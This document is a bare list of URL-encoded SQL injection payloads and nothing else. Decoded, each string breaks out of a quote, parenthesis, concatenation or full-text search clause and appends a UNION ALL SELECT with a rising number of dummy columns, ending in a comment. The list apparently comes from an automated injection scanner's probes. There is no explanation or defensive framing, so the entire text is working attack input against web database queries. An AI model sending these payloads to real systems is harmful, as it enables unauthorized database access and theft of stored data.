-7238%27%20WHERE%208767%3D8767%20UNION%20ALL%20SELECT%208767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%23 -7511%27%20WHERE%201579%3D1579%20UNION%20ALL%20SELECT%201579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%2C1579%23 -2551%27%20WHERE%207635%3D7635%20UNION%20ALL%20SELECT%207635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%2C7635%23 -5518%27%20WHERE%205373%3D5373%20UNION%20ALL%20SELECT%205373%2C5373%2C5373%2C5373%2C5373%2C5373%2C5373%2C5373%2C5373%2C5373%2C5373%2C5373%2C5373%2C5373%2C5373%2C5373%2C5373%23 -9762%27%20WHERE%201959%3D1959%20UNION%20ALL%20SELECT%201959%2C1959%2C1959%2C1959%2C1959%2C1959%2C1959%2C1959%2C1959%2C1959%2C1959%2C1959%2C1959%2C1959%2C1959%2C1959%2C1959%2C1959%23 -3740%27%20WHERE%206273%3D6273%20UNION%20ALL%20SELECT%206273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%2C6273%23 -4041%27%20WHERE%208798%3D8798%20UNION%20ALL%20SELECT%208798%2C8798%2C8798%2C8798%2C8798%2C8798%2C8798%2C8798%2C8798%2C8798%2C8798%2C8798%2C8798%2C8798%2C8798%2C8798%2C8798%2C8798%2C8798%2C8798%23 -7724%22%20WHERE%204938%3D4938%20UNION%20ALL%20SELECT%204938%2C4938%2C4938%2C4938%2C4938%2C4938%2C4938%2C4938%2C4938%2C4938%2C4938%23 -3081%22%20WHERE%202353%3D2353%20UNION%20ALL%20SELECT%202353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%2C2353%23 -4250%22%20WHERE%204661%3D4661%20UNION%20ALL%20SELECT%204661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%2C4661%23 -4200%22%20WHERE%203423%3D3423%20UNION%20ALL%20SELECT%203423%2C3423%2C3423%2C3423%2C3423%2C3423%2C3423%2C3423%2C3423%2C3423%2C3423%2C3423%2C3423%2C3423%23 -6418%22%20WHERE%203646%3D3646%20UNION%20ALL%20SELECT%203646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%2C3646%23 -6882%22%20WHERE%204031%3D4031%20UNION%20ALL%20SELECT%204031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%23 -7249%22%20WHERE%206055%3D6055%20UNION%20ALL%20SELECT%206055%2C6055%2C6055%2C6055%2C6055%2C6055%2C6055%2C6055%2C6055%2C6055%2C6055%2C6055%2C6055%2C6055%2C6055%2C6055%2C6055%23 -5250%22%20WHERE%204468%3D4468%20UNION%20ALL%20SELECT%204468%2C4468%2C4468%2C4468%2C4468%2C4468%2C4468%2C4468%2C4468%2C4468%2C4468%2C4468%2C4468%2C4468%2C4468%2C4468%2C4468%2C4468%23 -5518%22%20WHERE%202801%3D2801%20UNION%20ALL%20SELECT%202801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%23 -7106%22%20WHERE%201097%3D1097%20UNION%20ALL%20SELECT%201097%2C1097%2C1097%2C1097%2C1097%2C1097%2C1097%2C1097%2C1097%2C1097%2C1097%2C1097%2C1097%2C1097%2C1097%2C1097%2C1097%2C1097%2C1097%2C1097%23 -8429%20WHERE%207823%3D7823%20UNION%20ALL%20SELECT%207823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%23 -6437%20WHERE%208471%3D8471%20UNION%20ALL%20SELECT%208471%2C8471%2C8471%2C8471%2C8471%2C8471%2C8471%2C8471%2C8471%2C8471%2C8471%2C8471%23 -9085%20WHERE%208698%3D8698%20UNION%20ALL%20SELECT%208698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%23 -5931%20WHERE%204824%3D4824%20UNION%20ALL%20SELECT%204824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%23 -6877%20WHERE%207977%3D7977%20UNION%20ALL%20SELECT%207977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%2C7977%23 -2775%20WHERE%202793%3D2793%20UNION%20ALL%20SELECT%202793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%2C2793%23 -4716%20WHERE%202193%3D2193%20UNION%20ALL%20SELECT%202193%2C2193%2C2193%2C2193%2C2193%2C2193%2C2193%2C2193%2C2193%2C2193%2C2193%2C2193%2C2193%2C2193%2C2193%2C2193%2C2193%23 -8904%20WHERE%204681%3D4681%20UNION%20ALL%20SELECT%204681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%2C4681%23 -4295%20WHERE%203917%3D3917%20UNION%20ALL%20SELECT%203917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%2C3917%23 -4615%20WHERE%207378%3D7378%20UNION%20ALL%20SELECT%207378%2C7378%2C7378%2C7378%2C7378%2C7378%2C7378%2C7378%2C7378%2C7378%2C7378%2C7378%2C7378%2C7378%2C7378%2C7378%2C7378%2C7378%2C7378%2C7378%23 -6163%27%7C%7C%28SELECT%20%27gNdB%27%20FROM%20DUAL%20WHERE%207203%3D7203%20UNION%20ALL%20SELECT%207203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%2C7203%23 -3376%27%7C%7C%28SELECT%20%27fLrL%27%20FROM%20DUAL%20WHERE%208704%3D8704%20UNION%20ALL%20SELECT%208704%2C8704%2C8704%2C8704%2C8704%2C8704%2C8704%2C8704%2C8704%2C8704%2C8704%2C8704%23 -2915%27%7C%7C%28SELECT%20%27TZMD%27%20FROM%20DUAL%20WHERE%205557%3D5557%20UNION%20ALL%20SELECT%205557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%2C5557%23 -3127%27%7C%7C%28SELECT%20%27DpBl%27%20FROM%20DUAL%20WHERE%204570%3D4570%20UNION%20ALL%20SELECT%204570%2C4570%2C4570%2C4570%2C4570%2C4570%2C4570%2C4570%2C4570%2C4570%2C4570%2C4570%2C4570%2C4570%23 -5164%27%7C%7C%28SELECT%20%27yRVa%27%20FROM%20DUAL%20WHERE%207038%3D7038%20UNION%20ALL%20SELECT%207038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%23 -1872%27%7C%7C%28SELECT%20%27MsrH%27%20FROM%20DUAL%20WHERE%207356%3D7356%20UNION%20ALL%20SELECT%207356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%23 -1016%27%7C%7C%28SELECT%20%27GUjx%27%20FROM%20DUAL%20WHERE%209507%3D9507%20UNION%20ALL%20SELECT%209507%2C9507%2C9507%2C9507%2C9507%2C9507%2C9507%2C9507%2C9507%2C9507%2C9507%2C9507%2C9507%2C9507%2C9507%2C9507%2C9507%23 -7594%27%7C%7C%28SELECT%20%27hRvv%27%20FROM%20DUAL%20WHERE%205151%3D5151%20UNION%20ALL%20SELECT%205151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%23 -8725%27%7C%7C%28SELECT%20%27ZLGd%27%20FROM%20DUAL%20WHERE%204098%3D4098%20UNION%20ALL%20SELECT%204098%2C4098%2C4098%2C4098%2C4098%2C4098%2C4098%2C4098%2C4098%2C4098%2C4098%2C4098%2C4098%2C4098%2C4098%2C4098%2C4098%2C4098%2C4098%23 -6589%27%7C%7C%28SELECT%20%27tqLq%27%20FROM%20DUAL%20WHERE%202547%3D2547%20UNION%20ALL%20SELECT%202547%2C2547%2C2547%2C2547%2C2547%2C2547%2C2547%2C2547%2C2547%2C2547%2C2547%2C2547%2C2547%2C2547%2C2547%2C2547%2C2547%2C2547%2C2547%2C2547%23 -3748%27%7C%7C%28SELECT%20%27bIBk%27%20WHERE%204528%3D4528%20UNION%20ALL%20SELECT%204528%2C4528%2C4528%2C4528%2C4528%2C4528%2C4528%2C4528%2C4528%2C4528%2C4528%23 -9231%27%7C%7C%28SELECT%20%27lZIc%27%20WHERE%201273%3D1273%20UNION%20ALL%20SELECT%201273%2C1273%2C1273%2C1273%2C1273%2C1273%2C1273%2C1273%2C1273%2C1273%2C1273%2C1273%23 -2327%27%7C%7C%28SELECT%20%27mLoS%27%20WHERE%207125%3D7125%20UNION%20ALL%20SELECT%207125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%23 -6978%27%7C%7C%28SELECT%20%27gXDW%27%20WHERE%205333%3D5333%20UNION%20ALL%20SELECT%205333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%23 -3914%27%7C%7C%28SELECT%20%27LNzV%27%20WHERE%209038%3D9038%20UNION%20ALL%20SELECT%209038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%23 -3864%27%7C%7C%28SELECT%20%27xMgJ%27%20WHERE%209245%3D9245%20UNION%20ALL%20SELECT%209245%2C9245%2C9245%2C9245%2C9245%2C9245%2C9245%2C9245%2C9245%2C9245%2C9245%2C9245%2C9245%2C9245%2C9245%2C9245%23 -4069%27%7C%7C%28SELECT%20%27JqAD%27%20WHERE%207569%3D7569%20UNION%20ALL%20SELECT%207569%2C7569%2C7569%2C7569%2C7569%2C7569%2C7569%2C7569%2C7569%2C7569%2C7569%2C7569%2C7569%2C7569%2C7569%2C7569%2C7569%23 -1272%27%7C%7C%28SELECT%20%27aDKr%27%20WHERE%209929%3D9929%20UNION%20ALL%20SELECT%209929%2C9929%2C9929%2C9929%2C9929%2C9929%2C9929%2C9929%2C9929%2C9929%2C9929%2C9929%2C9929%2C9929%2C9929%2C9929%2C9929%2C9929%23 -2287%27%7C%7C%28SELECT%20%27IfEx%27%20WHERE%202776%3D2776%20UNION%20ALL%20SELECT%202776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%2C2776%23 -1221%27%7C%7C%28SELECT%20%27Aitp%27%20WHERE%208994%3D8994%20UNION%20ALL%20SELECT%208994%2C8994%2C8994%2C8994%2C8994%2C8994%2C8994%2C8994%2C8994%2C8994%2C8994%2C8994%2C8994%2C8994%2C8994%2C8994%2C8994%2C8994%2C8994%2C8994%23 -1204%27%2B%28SELECT%20Oqsp%20WHERE%205467%3D5467%20UNION%20ALL%20SELECT%205467%2C5467%2C5467%2C5467%2C5467%2C5467%2C5467%2C5467%2C5467%2C5467%2C5467%23 -5263%27%2B%28SELECT%20OvhS%20WHERE%203143%3D3143%20UNION%20ALL%20SELECT%203143%2C3143%2C3143%2C3143%2C3143%2C3143%2C3143%2C3143%2C3143%2C3143%2C3143%2C3143%23 -5060%27%2B%28SELECT%20bUvb%20WHERE%201809%3D1809%20UNION%20ALL%20SELECT%201809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%2C1809%23 -8123%27%2B%28SELECT%20NfmH%20WHERE%204129%3D4129%20UNION%20ALL%20SELECT%204129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%23 -5421%27%2B%28SELECT%20OflT%20WHERE%204044%3D4044%20UNION%20ALL%20SELECT%204044%2C4044%2C4044%2C4044%2C4044%2C4044%2C4044%2C4044%2C4044%2C4044%2C4044%2C4044%2C4044%2C4044%2C4044%23 -5432%27%2B%28SELECT%20bVXP%20WHERE%201874%3D1874%20UNION%20ALL%20SELECT%201874%2C1874%2C1874%2C1874%2C1874%2C1874%2C1874%2C1874%2C1874%2C1874%2C1874%2C1874%2C1874%2C1874%2C1874%2C1874%23 -2426%27%2B%28SELECT%20OnXh%20WHERE%208926%3D8926%20UNION%20ALL%20SELECT%208926%2C8926%2C8926%2C8926%2C8926%2C8926%2C8926%2C8926%2C8926%2C8926%2C8926%2C8926%2C8926%2C8926%2C8926%2C8926%2C8926%23 -8367%27%2B%28SELECT%20dgHd%20WHERE%204440%3D4440%20UNION%20ALL%20SELECT%204440%2C4440%2C4440%2C4440%2C4440%2C4440%2C4440%2C4440%2C4440%2C4440%2C4440%2C4440%2C4440%2C4440%2C4440%2C4440%2C4440%2C4440%23 -7864%27%2B%28SELECT%20XHux%20WHERE%204852%3D4852%20UNION%20ALL%20SELECT%204852%2C4852%2C4852%2C4852%2C4852%2C4852%2C4852%2C4852%2C4852%2C4852%2C4852%2C4852%2C4852%2C4852%2C4852%2C4852%2C4852%2C4852%2C4852%23 -5172%27%2B%28SELECT%20mPfq%20WHERE%208652%3D8652%20UNION%20ALL%20SELECT%208652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%23 -7308%27%2B%28SELECT%20%27syah%27%20WHERE%202603%3D2603%20UNION%20ALL%20SELECT%202603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%23 -3340%27%2B%28SELECT%20%27jlPf%27%20WHERE%209446%3D9446%20UNION%20ALL%20SELECT%209446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%2C9446%23 -1293%27%2B%28SELECT%20%27YzhW%27%20WHERE%203735%3D3735%20UNION%20ALL%20SELECT%203735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%2C3735%23 -2978%27%2B%28SELECT%20%27kgEa%27%20WHERE%203257%3D3257%20UNION%20ALL%20SELECT%203257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%23 -2100%27%2B%28SELECT%20%27sqNA%27%20WHERE%207088%3D7088%20UNION%20ALL%20SELECT%207088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%2C7088%23 -1980%27%2B%28SELECT%20%27gyyl%27%20WHERE%201050%3D1050%20UNION%20ALL%20SELECT%201050%2C1050%2C1050%2C1050%2C1050%2C1050%2C1050%2C1050%2C1050%2C1050%2C1050%2C1050%2C1050%2C1050%2C1050%2C1050%23 -1785%27%2B%28SELECT%20%27pBKy%27%20WHERE%209640%3D9640%20UNION%20ALL%20SELECT%209640%2C9640%2C9640%2C9640%2C9640%2C9640%2C9640%2C9640%2C9640%2C9640%2C9640%2C9640%2C9640%2C9640%2C9640%2C9640%2C9640%23 -7499%27%2B%28SELECT%20%27AmVo%27%20WHERE%205016%3D5016%20UNION%20ALL%20SELECT%205016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%2C5016%23 -6101%27%2B%28SELECT%20%27MxhJ%27%20WHERE%208049%3D8049%20UNION%20ALL%20SELECT%208049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%23 -9519%27%2B%28SELECT%20%27cSke%27%20WHERE%207385%3D7385%20UNION%20ALL%20SELECT%207385%2C7385%2C7385%2C7385%2C7385%2C7385%2C7385%2C7385%2C7385%2C7385%2C7385%2C7385%2C7385%2C7385%2C7385%2C7385%2C7385%2C7385%2C7385%2C7385%23 -5908%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209294%2C9294%2C9294%2C9294%2C9294%2C9294%2C9294%2C9294%2C9294%2C9294%2C9294%23 -6289%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203092%2C3092%2C3092%2C3092%2C3092%2C3092%2C3092%2C3092%2C3092%2C3092%2C3092%2C3092%23 -1809%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%23 -3751%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208899%2C8899%2C8899%2C8899%2C8899%2C8899%2C8899%2C8899%2C8899%2C8899%2C8899%2C8899%2C8899%2C8899%23 -6238%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%23 -1144%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%23 -3803%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%2C3160%23 -1545%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%23 -4981%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%2C3577%23 -1783%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206162%2C6162%2C6162%2C6162%2C6162%2C6162%2C6162%2C6162%2C6162%2C6162%2C6162%2C6162%2C6162%2C6162%2C6162%2C6162%2C6162%2C6162%2C6162%2C6162%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 